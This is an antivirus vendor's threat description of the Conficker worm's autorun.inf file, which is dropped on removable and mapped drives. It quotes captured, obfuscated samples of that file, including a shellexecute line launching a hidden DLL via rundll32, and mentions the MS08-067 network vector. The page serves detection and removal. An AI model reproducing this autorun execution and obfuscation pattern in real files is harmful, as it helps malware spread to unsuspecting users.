minimal-minimal

W32/Conficker.worm!inf

W32/Conficker.worm!inf

Threat Detail

  • Malware Type: Virus
  • Malware Sub-type: Worm
  • Protection Added: 2009-01-07
This is a generic detection for a configuration text file (autorun.inf) used by the W32/Conficker.worm. This file is usually dropped onto the root of all removable drivers and mapped drives in an attempt to autorun an executable when the drive is accesed.
Minimum Engine

5400.1158

File Length

Varies

Description Added

2009-01-07

Description Modified

2009-01-07

Malware Proliferation

fpo-ti-severity-legend logo-new-mcafee


--------------------Updated on 4th Dec 2013------------------------------------

Aliases

  • Kaspersky    -    Worm.Win32.AutoRun.gxk
  • Microsoft    -    Worm:Win32/Conficker.B!inf

Characteristics – 


W32/Conficker.worm!inf” is a detection for a configuration text file (autorun.inf) used by many worms. 


This file is usually dropped onto the root of all removable drivers and mapped drives in an attempt to autorun an executable when the drive is accessed.


The size for this file varies. The size differs based on the length of the filename being referenced inside the .inf file.


Some copies of this file has the System (S) and Hidden (H) attributes present in attempt to hide the file from certain, default, viewing options within Windows Explorer.


The autorun.inf is configured to launch the Trojan file via the following command syntax.

        [   AUTorUN  
 ;   
   ?A??l????KVW???  
 ¬        AcTION     
 ¬  =     ?????????????????
   ¬
  ¬          icon   = 
   %syStEmrOot%\sySTEM32\sHELL32.Dll         ,4
  ¬ 
;?Pr?So?WWCfDnhTvVQya??     
;     ?G?            ;      qTJ??r??o?gwDq∫?J?E?      
shelLExECUte 
   =RuNdLl32.EXE      .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn ;   
 zD?pl????uDb?yF??G
   ¬
;l???dG?Bw?sUmF
 ¬ 
;      ??bz?q?EiS?v????f??s?   
   useAuTopLAY         

Upon execution the Auto inf file tries to launch the source file from the following the location:


: shelLExECUte     =RuNdLl32.EXE      .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn [Detected as W32/Conficker.worm.gen.b]


The above file is a Worm that spreads by copying itself to Removable drives and root of the connected system drives. It also spreads across the network by exploiting vulnerability in the Windows Server service [Microsoft Security Bulletin MS08-067]. If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled.

------------------------Updated on 8 Nov 2013-------------------------------------------
Aliases

Microsoft    -    Worm:Win32/Conficker.B!inf
Symantec    -    W32.Downadup!autorun
Sunbelt    -    Worm.Win32.Conficker.B!inf
Trend        -    TROJ_DOWNAD.AD

“W32/Conficker.worm!inf” is a detection for a configuration text file (autorun.inf) used by many worms. 

This file is usually dropped onto the root of all removable drivers and mapped drives in an attempt to autorun an executable when the drive is accessed.

The size for this file varies. The size differs based on the length of the filename being referenced inside the .inf file.

Some copies of this file has the System (S) and Hidden (H) attributes present in attempt to hide the file from certain, default, viewing options within Windows Explorer.

The autorun.inf is configured to launch the Trojan file via the following command syntax.

 AcTION     
  ¬  =     Open folder to view files          
  ¬          icon  =     %syStEmrOot%\sySTEM32\sHELL32.Dll         ,4
;­Pr×SoàDWWCfDnhTvVQyaã¾     
;     «GáÊ      
       ;      qTJ¥•r€ÕoÍgwDqçÚJûKEí´û       
    shelLExECUte     =RuNdLl32.EXE      .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn ;   
 zD¾pl¿›cà½ÂuDbËyF½ÚG   ¬                                                    
;      f›yÊlÌÃèŠdGµBwAsUmF ¬ 
;      »Ÿobz²q•GEìªiSøµväF˜Ø¤ò¼fîNŒDs±                         
                       useAuTopLAY      =        1  
;    Fª†g•¿úoÖMÊc°­¹tYcÈìkdQeæØnD§äâÙrˆe…C¿ùlÝ„     
    
     [
  oiw]                     
 ;  ¬                
;ñ…Ïq¨YPhÖ‘±jHÙE¼€PšxEAb«¬µÞ˜ãñIzg›AÉdǸæĆ•‘bçÇ          
blGkNaAOAStfJarztHQsDTE     =      X                    ;    
¬      ;      Cnˆº´ðôãƒke´j÷gWÚ©ÖçJÇtþ¨iMUÒ‘çtáæVJd                 
;      UNÜaBYùfsÊ c¢a’nGHP¯TpZ¢wo     
;    ûÀzñIhMÖùîVÛXeäõÖrGa§”Z“FySÝIIUìHk¸¡ÍE®fWˆÞLÅ
        ljjpceByfnCqlEdvFuiQtTXOX    
  =        DsuZYNfdNfgLkgdubp        
                             ; JYcGRügMÖçwœÛF¨kkZ¤½ZdCnd³JedsTÞýe  
  娦AsüNHnÝóZWn gíUK®ÞH›nX                                 
;¬   HtEàGû¿†¶siâS‘‰dpšöD‰ßX»ZeHòhC       
 AHBpQMGeNELqWqgVFUI        = thvu                  
           t ¬  =en  
  ZpmLWwdy   =p  
      ;   ¬     D³‡™½âafRýPÒeIòmsbLP×UdggÒÒ‚hÔE¹JFâi°¶BHhu      ¬  
    JirRwHUIcdygM  = Dw        
yAPlzwzDWOQuOkdjb =        fTwwFgsQkIuovohIAEhoMk¬
;     ¬ J«O¨ƒ™ÏQ¿CþfCaz¸Âo‹        LkgTMQccsQukegpqMJbGmC      =       NiaNYPlDZlrMApJYhSxkUPAp                            
;
       ÀSÆgZ†Yuf¾KösxaÞÛXàAcfEÿf«çj•lI½®¿zuÈÑqCýkDWVìFÏPoF¥bÞ™      
;       ;     
U‚XÖßvXé®o…¹AG±         
    Df  =EEKpaGzdkYcdqw            
‘úNѬiôpívCÃcRDm—BVh¤ôgaWRq³xAšenAGÝpZtnMG¶W  
;  HÖŠJxcâQ×nIãl‘UÉð‡ÐÚLŸch±îŸÇ–½Ë‚Ÿ        ;     pgk³²h¶¾Yár—еa‚†ÂJDGlAkuy¯çSÝEofmj      
          tYtGgOcpNmnREFeVOVYcmXi          =BMlhoTHAdQ¬    
   wu     =      jgQDsI                          
   
           
Upon execution the Auto inf file tries to launch the source file from the following the location:

  • : shelLExECUte     =RuNdLl32.EXE      .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn [Detected as W32/Conficker.worm]

The above file is a Worm that spreads by copying itself to Removable drives and root of the connected system drives. It also spreads across the network by exploiting vulnerability in the Windows Server service [Microsoft Security Bulletin MS08-067]. If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled.


-----------------------------------------------------------------------------------------------------

This is a generic detection for a configuration text file (autorun.inf) used by the W32/Conficker.worm. This file is usually dropped onto the root of all removable drivers and mapped drives in an attempt to autorun an executable when the drive is accesed.

The size for this file varies.

Some copies of this file has the System (S) and Hidden (H) attributes present in attempt to hide the file from certain, default, viewing options within Windows Explorer.

The contents of the file are similar to the following:

....Garbage......

shelLExECUte=RuNdLl32.EXE .\RECYCLER\S-x-x-xx-2819952290-8240758988-879315005-xxxx\jwgkvsq.vmx,ahaezedrn

.....Garbage....

Upon Autorun being initiated the file is executed and infection occurs, because this infection is instigated locally the worm does not need to exploit ms08-067, so having applied the patch will not stop the infection.

 

 

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Infection starts either with manual execution of the binary or by navigating to folders containing an Autorun.inf whereby the autorun.inf files can cause auto-execution.
The presence of autorun.inf files on the root of all removable drives or mapped network drives containing information similar to that described in the "Characteristics" section.